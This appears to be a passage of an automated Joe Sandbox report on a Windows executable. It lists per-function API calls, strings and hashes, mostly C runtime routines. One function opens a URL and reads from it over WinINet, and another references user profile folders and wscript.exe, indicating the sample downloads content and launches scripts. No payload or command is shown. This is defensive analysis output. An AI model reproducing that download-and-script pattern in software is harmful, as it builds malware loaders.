                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseHandle$Process$CurrentFileModuleNameOpen
                                                                                                                                                                                            • String ID: APPDATA$C:\ProgramData$C:\Windows\Microsoft.NET$LOCALAPPDATA$USERPROFILE$wscript.exe
                                                                                                                                                                                            • API String ID: 1772831937-2916873119
                                                                                                                                                                                            • Opcode ID: a469c25abaf6b9a0a42e4d88f5ec1e5255be694c7d284a3df74deb8752ef50a6
                                                                                                                                                                                            • Instruction ID: 81a527bbd3094fa1bf4f9290b55bf704fd2313607f989bb615c789d682520510
                                                                                                                                                                                            • Opcode Fuzzy Hash: a469c25abaf6b9a0a42e4d88f5ec1e5255be694c7d284a3df74deb8752ef50a6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6EB12576E006049BDB10DBB8CC85BBEBF79FF90360F584168E816A7282D735ED468758
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 00566A6C
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565CF1
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D03
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D15
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D27
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D39
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D4B
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D5D
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D6F
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D81
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D93
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565DA5
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565DB7
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565DC9
                                                                                                                                                                                            • _free.LIBCMT ref: 00566A61
                                                                                                                                                                                              • Part of subcall function 0055CE37: HeapFree.KERNEL32(00000000,00000000,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?), ref: 0055CE4D
                                                                                                                                                                                              • Part of subcall function 0055CE37: GetLastError.KERNEL32(?,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?,?), ref: 0055CE5F
                                                                                                                                                                                            • _free.LIBCMT ref: 00566A83
                                                                                                                                                                                            • _free.LIBCMT ref: 00566A98
                                                                                                                                                                                            • _free.LIBCMT ref: 00566AA3
                                                                                                                                                                                            • _free.LIBCMT ref: 00566AC5
                                                                                                                                                                                            • _free.LIBCMT ref: 00566AD8
                                                                                                                                                                                            • _free.LIBCMT ref: 00566AE6
                                                                                                                                                                                            • _free.LIBCMT ref: 00566AF1
                                                                                                                                                                                            • _free.LIBCMT ref: 00566B29
                                                                                                                                                                                            • _free.LIBCMT ref: 00566B30
                                                                                                                                                                                            • _free.LIBCMT ref: 00566B4D
                                                                                                                                                                                            • _free.LIBCMT ref: 00566B65
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                                                                            • Opcode ID: fcd598e0c64765ca8e5f994308a9811f3d669e002715af052879bf83ff775c3d
                                                                                                                                                                                            • Instruction ID: 3dee5d883313234914dfa8f11fd598e0f3022a28b5ff09f571966656e2eeb15f
                                                                                                                                                                                            • Opcode Fuzzy Hash: fcd598e0c64765ca8e5f994308a9811f3d669e002715af052879bf83ff775c3d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 48314B31600302DFEB21AA78E94AB5A7FE9FF40751F14842AE498E7161DF71BC44CB20
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                            • Opcode ID: a8e2ed7d33b8c294386bd28116111f91e8393b8346ce930f2e9ff11e975637b7
                                                                                                                                                                                            • Instruction ID: 2c94900c92a8d7f6d91b958572844682ad53082a49013ef4352b2175d0a3ab17
                                                                                                                                                                                            • Opcode Fuzzy Hash: a8e2ed7d33b8c294386bd28116111f91e8393b8346ce930f2e9ff11e975637b7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 14C14376E40605AFDB20DBA8CC56FEE7BF8BB48714F144165FA05EB282D670AE418B50
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 00553DC5
                                                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 00553DE7
                                                                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 00553EF6
                                                                                                                                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 00553FC8
                                                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 0055404C
                                                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 00554067
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                            • API String ID: 2123188842-393685449
                                                                                                                                                                                            • Opcode ID: 712b5f3d7081adcf9441e666ad7d544e6442d8cf2041a31e8d9f8917eb329fb3
                                                                                                                                                                                            • Instruction ID: 272f7973783a89f6c938b694f14fc717628ad5c927d883884307764814d1c259
                                                                                                                                                                                            • Opcode Fuzzy Hash: 712b5f3d7081adcf9441e666ad7d544e6442d8cf2041a31e8d9f8917eb329fb3
                                                                                                                                                                                            • Instruction Fuzzy Hash: A8B19971C0020AEFCF25DFA4C8A99AEBFB5BF44352B14445AEC096B212D335DA59CF91
APIs
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005356F1
• InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84000100,00000000), ref: 0053575B
• InternetCloseHandle.WININET(00000000), ref: 00535768
• InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 005357C9
• InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 005357FB
• InternetCloseHandle.WININET(00000000), ref: 0053580C
• InternetCloseHandle.WININET(00000000), ref: 0053580F
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: Internet$CloseHandle$FileOpenRead
• String ID: Couldn't open Internet!$Couldn't open URL!
• API String ID: 3539267403-1021515825
• Opcode ID: c688d3fff9a4acdbd97173acd2ed76ef16be62c4ebcd0c18fb3853d1aa76a471
• Instruction ID: e97e448f0011a209cbf0a3d8bf62b22229f103d0d8d4f1d2facac2f1f548ee43
• Opcode Fuzzy Hash: c688d3fff9a4acdbd97173acd2ed76ef16be62c4ebcd0c18fb3853d1aa76a471
• Instruction Fuzzy Hash: DA5196B5A10609ABEF14DFA4DC4ABAEBF79FF44305F108119F901B7281E7749A44CBA0
APIs
• _free.LIBCMT ref: 0055C98E
  • Part of subcall function 0055CE37: HeapFree.KERNEL32(00000000,00000000,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?), ref: 0055CE4D
  • Part of subcall function 0055CE37: GetLastError.KERNEL32(?,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?,?), ref: 0055CE5F
• _free.LIBCMT ref: 0055C99A
• _free.LIBCMT ref: 0055C9A5
• _free.LIBCMT ref: 0055C9B0
• _free.LIBCMT ref: 0055C9BB
• _free.LIBCMT ref: 0055C9C6
• _free.LIBCMT ref: 0055C9D1
• _free.LIBCMT ref: 0055C9DC
• _free.LIBCMT ref: 0055C9E7
• _free.LIBCMT ref: 0055C9F5
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: ec99a7af3329ba2bb5edd33370232146be75419598044e7437dbb5fd27e8cc59
• Instruction ID: 29c3df6041195d33e0923fb225520b3ac41a6b573670f6756c8aea4550524e39
• Opcode Fuzzy Hash: ec99a7af3329ba2bb5edd33370232146be75419598044e7437dbb5fd27e8cc59
• Instruction Fuzzy Hash: 1A21D676900209AFCB02EF94C996CDE7FB8BF48741F4081A6B9059B521DB31FA49CB81
APIs
• std::locale::_Init.LIBCPMT ref: 0053C4D7
  • Part of subcall function 0054F760: std::_Lockit::_Lockit.LIBCPMT ref: 0054F772
  • Part of subcall function 0054F760: std::locale::_Setgloballocale.LIBCPMT ref: 0054F78D
  • Part of subcall function 0054F760: _Yarn.LIBCPMT ref: 0054F7A3
  • Part of subcall function 0054F760: std::_Lockit::~_Lockit.LIBCPMT ref: 0054F7E3
• std::_Lockit::_Lockit.LIBCPMT ref: 0053C4EC
• std::_Lockit::_Lockit.LIBCPMT ref: 0053C507
• std::_Lockit::~_Lockit.LIBCPMT ref: 0053C527
• __Getcoll.LIBCPMT ref: 0053C5AA
• std::_Facet_Register.LIBCPMT ref: 0053C5DC
• std::_Lockit::~_Lockit.LIBCPMT ref: 0053C5F4
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$std::locale::_$Facet_GetcollInitRegisterSetgloballocaleYarn
• String ID: ios_base::badbit set
• API String ID: 1067193257-3882152299
• Opcode ID: c15928194d2f81d8ab9fe14cb97e24ae702b69ca3f3b8e3a0cdd486350134939
• Instruction ID: 99029c2c27bb8ee292840eac1b137433d11c43d63b43bc1f04bf4f2103e99841
• Opcode Fuzzy Hash: c15928194d2f81d8ab9fe14cb97e24ae702b69ca3f3b8e3a0cdd486350134939
• Instruction Fuzzy Hash: 5341CF719002169FCB24DF68D8499AEBFB4FF90310F148569E806BB292DB31FD09CB91
APIs
• _ValidateLocalCookies.LIBCMT ref: 00553797
• ___except_validate_context_record.LIBVCRUNTIME ref: 0055379F
• _ValidateLocalCookies.LIBCMT ref: 00553828
• __IsNonwritableInCurrentImage.LIBCMT ref: 00553853
• _ValidateLocalCookies.LIBCMT ref: 005538A8
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: @0S$O&U$csm
• API String ID: 1170836740-3755504247
• Opcode ID: 8f07dfa0ae4b18a956baa582fdc2ee5299555a0202c5ef6314ff6d7ffb72f5d8
• Instruction ID: 0245d66377412d1c5f5f435dc74492ab0ac1854de0ffe81ab5976fbb1b8144ec
• Opcode Fuzzy Hash: 8f07dfa0ae4b18a956baa582fdc2ee5299555a0202c5ef6314ff6d7ffb72f5d8
• Instruction Fuzzy Hash: F241E174E002099BCF10DF68C899A9EBFB5FF45355F148096FC19AB392C731AA49CB90
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00531B92
• std::_Lockit::_Lockit.LIBCPMT ref: 00531BAD
• std::_Lockit::~_Lockit.LIBCPMT ref: 00531BCD
• std::_Lockit::~_Lockit.LIBCPMT ref: 00531C1E
• __Getctype.LIBCPMT ref: 00531C6D
• std::_Facet_Register.LIBCPMT ref: 00531C93
• std::_Lockit::~_Lockit.LIBCPMT ref: 00531CAB
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_GetctypeRegister
• String ID: dV
• API String ID: 2525760861-971893479
• Opcode ID: a67ddd73a67cb3ebe12de63a0777c519aa27677572fe41e1b14adbb8eeab2b9e
• Instruction ID: 312fb3cc1e6d8b76b2a7aa6611f28016b31d5dfc28413815489b6e7f81f18200
• Opcode Fuzzy Hash: a67ddd73a67cb3ebe12de63a0777c519aa27677572fe41e1b14adbb8eeab2b9e
• Instruction Fuzzy Hash: 0B41F331A006199FCB10DF68D8959E9BBB4FF50314F146569EC0AAB352EB31ED49CBC0
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 009c54be13120221d805ad0c40251b1e59c9b5ab8935462d10c351977d38fa7e
                                                                                                                                                                                            • Instruction ID: d2bfdaaacc5782b98d2d2c5f016ac3f5997ba33d600d46074414eab69b55ac18
                                                                                                                                                                                            • Opcode Fuzzy Hash: 009c54be13120221d805ad0c40251b1e59c9b5ab8935462d10c351977d38fa7e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 08C10470E04206EFDF15DF98D8A5BAD7FB4BF49322F14406AED04AB292C7709949CB61
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                            • Opcode ID: 16377dff718e34370175ecd5e0fb49860c88454d521e6fac879f4748136e0fab
                                                                                                                                                                                            • Instruction ID: 80629d53c92506d52e6cbe6c89ae3d427eda4fccb5243088fa472bd51439c30a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 16377dff718e34370175ecd5e0fb49860c88454d521e6fac879f4748136e0fab
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0761E276A00305AFDB20DF64D851BAABFF9FF84710F10492AE955EB281EB70AD40DB50
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0055CA90: GetLastError.KERNEL32(00531920,00000001,00531924,00556D0D,00000001,00000000,00000000,?,0055CD85,00000000,00000000,00000001,00000000,00531920,00000104), ref: 0055CA95
                                                                                                                                                                                              • Part of subcall function 0055CA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,0055CD85,00000000,00000000,00000001,00000000,00531920,00000104), ref: 0055CB33
                                                                                                                                                                                            • _free.LIBCMT ref: 0055B3A4
                                                                                                                                                                                            • _free.LIBCMT ref: 0055B3BD
                                                                                                                                                                                            • _free.LIBCMT ref: 0055B3FB
                                                                                                                                                                                            • _free.LIBCMT ref: 0055B404
                                                                                                                                                                                            • _free.LIBCMT ref: 0055B410
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorLast
                                                                                                                                                                                            • String ID: @0S$C
                                                                                                                                                                                            • API String ID: 3291180501-507328144
                                                                                                                                                                                            • Opcode ID: 5f7f82cb8e00cbb5086f9d56a580fb631a05b8181d89e384f031b1bca6c0a7ec
                                                                                                                                                                                            • Instruction ID: 290f997f2ff9e4368a03f943fefb52e901e6cbb8b18b2d703dd0dbed08b8ff18
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f7f82cb8e00cbb5086f9d56a580fb631a05b8181d89e384f031b1bca6c0a7ec
                                                                                                                                                                                            • Instruction Fuzzy Hash: FEB17C7590161ADFEB24DF18C8A9BADBBB5FF48305F5045AAE809A7350D730AE94CF40
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0056097D: HeapAlloc.KERNEL32(00000000,?,?,?,005518D8,?,?,?,?,?,005311E3,?,?), ref: 005609AF
                                                                                                                                                                                            • _free.LIBCMT ref: 0055AD3D
                                                                                                                                                                                            • _free.LIBCMT ref: 0055AD54
                                                                                                                                                                                            • _free.LIBCMT ref: 0055AD71
                                                                                                                                                                                            • _free.LIBCMT ref: 0055AD8C
                                                                                                                                                                                            • _free.LIBCMT ref: 0055ADA3
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$AllocHeap
                                                                                                                                                                                            • String ID: \2W$x2W
                                                                                                                                                                                            • API String ID: 1835388192-3612702823
                                                                                                                                                                                            • Opcode ID: f18ce5198a150787a04fd6607b09ffbcaa083e362edc7656070b8848dbc86a5e
                                                                                                                                                                                            • Instruction ID: ca6e3c42cfb260ab227182dfd1ac84996483f232ee8d8caa606d215e386739f0
                                                                                                                                                                                            • Opcode Fuzzy Hash: f18ce5198a150787a04fd6607b09ffbcaa083e362edc7656070b8848dbc86a5e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6551E371A003059FDB219F29DC52A6A7BF4FF84722F14466AEC49DB290E731EE089B41
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00531A62
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00531A7D
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00531A9D
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00531AEE
                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00531B50
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00531B68
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
                                                                                                                                                                                            • String ID: dV
                                                                                                                                                                                            • API String ID: 1858714459-971893479
                                                                                                                                                                                            • Opcode ID: 1b11d0e6afc8523bcbfb1b17288a56d8faba3f4bb686a36fe0088d5ecc10ead3
                                                                                                                                                                                            • Instruction ID: 0c2d54a5358f2c4ba5cbfdc07d6e7d818f6b711f91744e22d6498ba35c209a65
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b11d0e6afc8523bcbfb1b17288a56d8faba3f4bb686a36fe0088d5ecc10ead3
                                                                                                                                                                                            • Instruction Fuzzy Hash: C6310435A016119FCB20DF68D8959A9FBB0FF50350F1851A9EC4AAB351EB31ED4ACBC4
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$___from_strstr_to_strchr
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3409252457-0
                                                                                                                                                                                            • Opcode ID: 6083febe7f511870d26712ef4bf71ae5d9068466e5367ebbb81a697ef6f34d7a
                                                                                                                                                                                            • Instruction ID: 20927dc15e69fe1ecfe9787a9785219fe93bc269d278d8759f05d399277864a0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6083febe7f511870d26712ef4bf71ae5d9068466e5367ebbb81a697ef6f34d7a
                                                                                                                                                                                            • Instruction Fuzzy Hash: D75125B1984742EFDF21AF64D896A6E7FB8FF41710F10456AE910AB181FB319908CB50
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
